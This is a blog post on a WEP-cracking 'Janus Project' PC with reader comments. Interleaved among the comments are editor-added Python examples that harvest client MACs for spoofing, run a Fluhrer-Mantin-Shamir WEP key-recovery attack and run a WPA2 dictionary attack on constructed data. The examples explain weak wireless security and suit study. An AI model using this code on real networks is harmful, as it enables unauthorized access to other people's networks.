
You've heard of black hat hackers and white hat hackers, but what about leather hat hackers? Meet the first: Kyle Williams. This creative genius has built the ultimate network hacking PC, the "Janus Project," which can focus its eight WiFi cards to break your standard WEP encryption in under five minutes. Beyond that, it can sniff 300 WiFi networks simultaneously and store all captured data, continuously encrypting it with 256-bit AES keys. In addition, the Janus Project has an instant off switch; regaining access requires a USB key holding a 2000-bit passkey plus a separate password. What's under the hood? Williams packed an Ubuntu Linux machine running on a 1.5GHz VIA C7 processor with an Acer 17-inch screen into that snazzy little rugged yellow box. Oh, and the closed case is waterproof too, in case you need to transport the Janus Project on a whitewater raft to your next hacking hotspot. We don't doubt someone will.
[Via The Raw Feed]
Can break WEP keys in under 5 minutes?!? WOW!
Ok, so what if I have MAC-based access as well...?
Unless you can access into my ap (of which you would have to have an allowed MAC address), find the MAC access list, spoof your MAC for one of the allowed MACs... which you would need to access my ap (of which you would have to have an allowed MAC address)...
See a problem here?
[re: James Bishop]
It would be nice if people would learn that not all hackers are evil! I hack but I do not do it for nefarious reasons and never to steal anything, only to learn; no different than a shade-tree mechanic with a toolbox and his car.
So the "genius" part is? I mean, it's a really cool hack job, but it doesn't sound like he has done anything remarkable. If they actually said anything about how he set it up it would be another thing entirely, but from the blurb it sounds like he just put together off-the-shelf code. Am I missing something really cool?
Haven't seen this one yet, but wasn't JANUS the name of the villainous organization in "Goldeneye" for the N64?
@bpc
Dude, thanks for that - I was about to chime in on the Sneakers mis-quote.
@Wes -
No one would have to have access to your router; the MAC address of your NIC can be sniffed out by the same tools that are used to break the WEP key, then it can simply be spoofed. This is extremely easy for someone who knows how to break a WEP key to do. The only way to truly secure it would be to use some other sort of encryption, e.g. WPA, WPA2, etc.
MAC filtering is easy to get around. Use Kismet to sniff the network and it will show you the MAC addresses of the systems attached to the network... then all you have to do is use a MAC address changer and voila, you are on the network. WEP will only protect you for 5-10 min past that. Best bet... turn the wireless off and make like Glade and "plug it in... plug it in" *grin*
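Editor's added example, not code from the post or from any commenter: the point made in the replies above is that the 802.11 MAC header is never encrypted, so WEP (or WPA) protects only the frame body while the station addresses travel in the clear. The parser below decodes the header of constructed sample frames (addresses, frame types and ciphertext bytes are all made up here) and builds a Kismet-style BSSID-to-clients table from WEP-protected data frames, which is exactly the list an attacker picks a MAC from.

```python
import struct

# Constructed sample addresses; none of these come from a real capture.
BROADCAST = bytes.fromhex("ffffffffffff")
AP_BSSID  = bytes.fromhex("001a2b3c4d5e")
STATION   = bytes.fromhex("0016ceaabbcc")
LAPTOP2   = bytes.fromhex("000c29112233")
GATEWAY   = bytes.fromhex("00d0cc001122")

# Frame Control flag bits (second byte of the FC field).
TO_DS, FROM_DS, PROTECTED = 0x01, 0x02, 0x40

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def build_frame(fc0, flags, a1, a2, a3, body=b""):
    """Minimal 802.11 header (FC, duration, A1-A3, sequence) + body, no FCS."""
    return struct.pack("<BBH", fc0, flags, 0) + a1 + a2 + a3 + struct.pack("<H", 0) + body

def parse_frame(frame):
    """Decode the cleartext MAC header. WEP only encrypts the body, so every
    address is readable even when the Protected bit is set."""
    fc0, flags = frame[0], frame[1]
    ftype = (fc0 >> 2) & 0x3
    to_ds, from_ds = bool(flags & TO_DS), bool(flags & FROM_DS)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    # Which address is which depends on the To-DS/From-DS bits.
    if not to_ds and not from_ds:      # ad-hoc / management
        da, sa, bssid, hdr = a1, a2, a3, 24
    elif to_ds and not from_ds:        # station -> AP
        bssid, sa, da, hdr = a1, a2, a3, 24
    elif from_ds and not to_ds:        # AP -> station
        da, bssid, sa, hdr = a1, a2, a3, 24
    else:                              # WDS, 4 addresses, no single BSSID
        da, sa, bssid, hdr = a3, frame[24:30], None, 30
    return {
        "type": {0: "mgmt", 1: "ctrl", 2: "data"}.get(ftype, "rsvd"),
        "to_ds": to_ds, "from_ds": from_ds,
        "protected": bool(flags & PROTECTED),
        "sa": mac_str(sa), "da": mac_str(da),
        "bssid": mac_str(bssid) if bssid else None,
        "body": frame[hdr:],           # IV + key id + ciphertext when protected
    }

def is_group(mac):
    """Multicast/broadcast: low bit of the first octet is set."""
    return int(mac[:2], 16) & 1 == 1

def harvest_clients(frames):
    """Kismet-style inventory: BSSID -> set of station MACs seen exchanging data
    with it. A MAC allow-list is defeated by cloning any entry from this set."""
    clients = {}
    for raw in frames:
        f = parse_frame(raw)
        if f["type"] != "data" or f["bssid"] is None:
            continue
        if f["to_ds"] and not f["from_ds"]:
            station = f["sa"]           # the sender is the wireless client
        elif f["from_ds"] and not f["to_ds"]:
            station = f["da"]           # the receiver is the wireless client
        else:
            continue
        if not is_group(station):
            clients.setdefault(f["bssid"], set()).add(station)
    return clients

# Constructed capture: a beacon, two WEP-protected data frames (body = 3-byte
# IV, key id byte, opaque ciphertext) and one protected broadcast from the AP.
SAMPLE_FRAMES = [
    build_frame(0x80, 0, BROADCAST, AP_BSSID, AP_BSSID, b"\x00" * 12),       # beacon
    build_frame(0x08, TO_DS | PROTECTED, AP_BSSID, STATION, GATEWAY,
                bytes.fromhex("0a1b2c00") + bytes(range(40, 72))),           # sta -> AP
    build_frame(0x08, FROM_DS | PROTECTED, LAPTOP2, AP_BSSID, GATEWAY,
                bytes.fromhex("0a1b2d00") + bytes(range(100, 132))),         # AP -> sta
    build_frame(0x08, FROM_DS | PROTECTED, BROADCAST, AP_BSSID, GATEWAY,
                bytes.fromhex("0a1b2e00") + bytes(range(7, 39))),            # AP -> all
]

if __name__ == "__main__":
    for bssid, stations in harvest_clients(SAMPLE_FRAMES).items():
        print(bssid, "clients:", sorted(stations))
```

With a harvested address in hand, the spoof on Linux is a plain `ip link set dev wlan0 address <mac>` (interface down first, up after); the AP has no way to tell the clone from the real client, which is why MAC filtering adds no security against anyone who can already sniff the channel.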
@Wes
Why do I need to get into your AP for the MAC exactly? The MAC broadcasts freely in the clear anytime you talk to your AP and it's possible to pull it from the traffic and clone it, no biggie. Yes, there would be a duplicate MAC on the network, but if one has more power than the other the stronger one wins; gotta love directional antennas. MAC access filtering doesn't slow down an attacker using Linux tools, which tend to be a lot more flexible than Windows.
The 5 min claim is what seems a bit far-fetched. I know how to break WEP as I've done it myself with my own paws, not watched some demonstration on a stage. In my experience it takes a bit longer than 5 minutes, which is why I questioned it in the first place. If you simply accumulate traffic yourself then it will take a lot longer even on a really busy network; I did mine while downloading torrents and it took a good half hour. If you use a second NIC it's possible to cause the target network to spew traffic in response and you can build up a pile of packets much more quickly, but no, not 5 minutes in my experience, and it's a lot noisier since it's not passive. When you've got enough packets though it only takes SECONDS to get the key even if it's a lengthy hex key created randomly. Kind of fun to watch it break actually :-)
Rolling the key works; you can change it faster than the attacker can accumulate traffic to crack it. Terrific! Now do it across hundreds of clients :-) Not going to happen with WEP, at least not the preshared key stuff you run at home with even a handful of clients. WPA does something like this, although depending upon the version of WPA that too has some vulnerabilities during the initial client association. I understand WPA a lot less and there's still a lot of hardware out there that won't support it too.
It *is* possible to secure wireless, it's just not so easy that it can be done without some thought. Some of the protocols have been pretty flawed but it's better than nothing.
Me? I run 128-bit WEP. I know it can be broken but it's a clear No Trespassing sign, so if I do catch someone on my network I can hunt them down and have a clear legal case. I wouldn't even bother with MAC filtering; not worth the added hassle for you and not a significant deterrent to the attacker...
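Editor's added example, not code from the post or from the commenter above, illustrating why WEP cracking is a packet-counting exercise that finishes in seconds once enough frames are in hand. It is a small reproduction of the Fluhrer-Mantin-Shamir weak-IV attack on WEP's RC4 key schedule: every WEP frame starts with the known LLC/SNAP byte 0xAA, so the first keystream byte is known, and for IVs of the form (A+3, 255, X) the RC4 key schedule leaks key byte A with roughly 5% probability per frame. Votes over a few hundred such frames pick out each byte. The 40-bit root key, the ARP payload and the "captured" frames are all constructed here, the CRC-32 ICV is omitted, and the frame simulation hands the attacker one frame per weak IV, which a real AP never does; that gap is the "accumulate traffic or replay ARP" step the comment describes.

```python
# Toy FMS attack on WEP. Constructed key and frames; not Janus Project code.

def rc4_keystream(key, n):
    """Plain RC4: key-scheduling (KSA) then n bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

SNAP_DSAP = 0xAA                              # first plaintext byte of every WEP data frame
LLC_SNAP_PREFIX = bytes.fromhex("aaaa03000000")  # LLC header + zero OUI (IP/ARP frames)

def wep_encrypt(root_key, iv, plaintext):
    """WEP: per-packet RC4 key = IV || root key, IV sent in the clear, key id 0."""
    ks = rc4_keystream(iv + root_key, len(plaintext))
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(plaintext, ks))

def wep_decrypt(root_key, frame):
    iv, ct = frame[:3], frame[4:]
    return bytes(c ^ k for c, k in zip(ct, rc4_keystream(iv + root_key, len(ct))))

def ksa_prefix(key_prefix, steps):
    """Run only the first `steps` KSA rounds, which need only the key bytes we know."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key_prefix[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j

def fms_recover(frames, key_len, depth=8):
    """Recover the root key from WEP bodies (IV || key id || ciphertext).
    For key byte A, frames with IV (A+3, 255, X) are 'resolved': after A+3 KSA
    rounds S[1] + S[S[1]] == A+3, so with ~5% probability the first keystream
    byte z equals the value swapped into S[A+3] by the unknown key byte, giving
    K[A] = S^-1(z) - j - S[A+3]. Wrong guesses spread evenly, so the true byte
    wins the vote; a short search over the top `depth` candidates per byte,
    checked against the known LLC/SNAP header, absorbs statistical noise."""
    def vote(known):
        A = len(known)
        votes = [0] * 256
        for f in frames:
            iv, c0 = f[:3], f[4]
            if iv[0] != A + 3 or iv[1] != 0xFF:
                continue                      # not a weak IV for this position
            z = c0 ^ SNAP_DSAP                # first keystream byte, known plaintext
            S, j = ksa_prefix(list(iv) + known, A + 3)
            if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
                continue                      # earlier rounds disturbed the setup
            votes[(S.index(z) - j - S[A + 3]) & 0xFF] += 1
        return sorted(range(256), key=lambda b: -votes[b])[:depth]

    def search(known):
        if len(known) == key_len:
            key = bytes(known)
            return key if wep_decrypt(key, frames[0]).startswith(LLC_SNAP_PREFIX) else None
        for b in vote(known):
            hit = search(known + [b])
            if hit:
                return hit
        return None
    return search([])

ROOT_KEY = bytes.fromhex("1f2a3b4c5d")        # constructed 40-bit WEP key
ARP_PLAINTEXT = bytes.fromhex("aaaa030000000806") + bytes.fromhex("0001080006040001")

def capture_weak_iv_frames(root_key, key_len):
    """Stand-in for sniffing: one ARP frame per weak IV (A+3, 255, X)."""
    return [wep_encrypt(root_key, bytes([A + 3, 0xFF, x]), ARP_PLAINTEXT)
            for A in range(key_len) for x in range(256)]

if __name__ == "__main__":
    frames = capture_weak_iv_frames(ROOT_KEY, len(ROOT_KEY))
    print(len(frames), "weak-IV frames ->", fms_recover(frames, len(ROOT_KEY)).hex())
```

The vote for byte A needs bytes 0..A-1 already recovered, which is why the search proceeds byte by byte; with the weak-IV frames collected, the whole thing is a few thousand short RC4 prefix runs, hence "seconds" once the capture is large enough. Collecting enough naturally occurring weak IVs is the slow, passive part; ARP replay from a second card forces the AP to cycle IVs faster, at the cost of being visible.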
WPA2 with MAC filtering and signal power dropped to a 25 foot range. I challenge you to get into my network. Because you would have to park in my driveway to be close enough to get signal. And if you were in my driveway, I would shoot you. I live in Vermont, we are crazy bastards up here. And yes, it is legal to shoot trespassers.
Everyone should check out WiCrawl, a project that aims to do a very similar task. It is in alpha release at the moment and should be available to the public very soon. The application aims to be the next step in wifi scanning.
You can find wicrawl here, it's now publicly available:
http://midnightresearch.com/projects/wicrawl/
Actually it looks more like a Storm Case, http://www.stormcase.com/.
Nice box the guy built.
The thing is that it probably still couldn't break WPA2(AES)-PSK with a strong password or WPA2-Enterprise with something like EAP-TLS on a RADIUS server, because he'd have to break the key, not just sniff out a few WEP packets. Eight radios make it fast to sniff out packets but do not necessarily mean he can crack a well-configured WPA setup.
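Editor's added example, not code from the post or from the commenter above, showing what "he'd have to break the key" costs for WPA2-PSK. The pre-shared key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt and 4096 iterations, so every guess in an offline attack costs 4096 HMAC computations, and there is no statistical shortcut like WEP's weak IVs: more captured frames do not help, only more guesses. The wordlist and SSID are constructed; in a real attack each candidate PSK is checked against the MIC of a captured 4-way handshake, and here the target PSK itself stands in for that check.

```python
import hashlib
import time

def derive_psk(passphrase, ssid):
    """WPA/WPA2-Personal PSK (IEEE 802.11i): PBKDF2-HMAC-SHA1, 4096 rounds,
    256-bit output. The SSID is the salt, so precomputed tables only work
    for one network name at a time."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

# Constructed wordlist; stands in for a real dictionary.
WORDLIST = ["password", "12345678", "letmein", "qwerty123", "letmein1", "janus2006"]

def dictionary_attack(target_psk, ssid, wordlist):
    """Offline guess loop. Returns (passphrase, guesses) or (None, guesses).
    Comparing against the PSK directly is a stand-in for verifying the
    handshake MIC; the per-guess cost is the same either way."""
    for n, word in enumerate(wordlist, 1):
        if derive_psk(word, ssid) == target_psk:
            return word, n
    return None, len(wordlist)

def guesses_per_second(ssid, samples=20):
    """Measure this machine's PBKDF2 rate (single core, pure hashlib)."""
    t0 = time.perf_counter()
    for i in range(samples):
        derive_psk(f"bench{i}", ssid)
    return samples / (time.perf_counter() - t0)

def expected_years(keyspace, rate):
    """Average time to hit a uniformly random passphrase: half the keyspace."""
    return keyspace / 2 / rate / (365 * 24 * 3600)

if __name__ == "__main__":
    ssid = "HomeNet"
    weak = derive_psk("letmein1", ssid)
    print("weak passphrase recovered:", dictionary_attack(weak, ssid, WORDLIST))
    rate = guesses_per_second(ssid)
    print(f"{rate:.0f} guesses/s on this host")
    # 12 random alphanumeric characters: 62**12 candidates, no dictionary hit.
    print(f"random 12-char passphrase: ~{expected_years(62 ** 12, rate):.2e} years")
```

The measured rate is for one Python process; GPU crackers do orders of magnitude better, but the 62**12 figure makes clear why only the dictionary case is practical: a long random passphrase (or EAP-TLS, where there is no passphrase to guess at all) moves the attack from minutes to geological time.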
Maybe he could though...
I am DUMB, I wish I were that brilliant.
that's.....so bad ass.
*drool*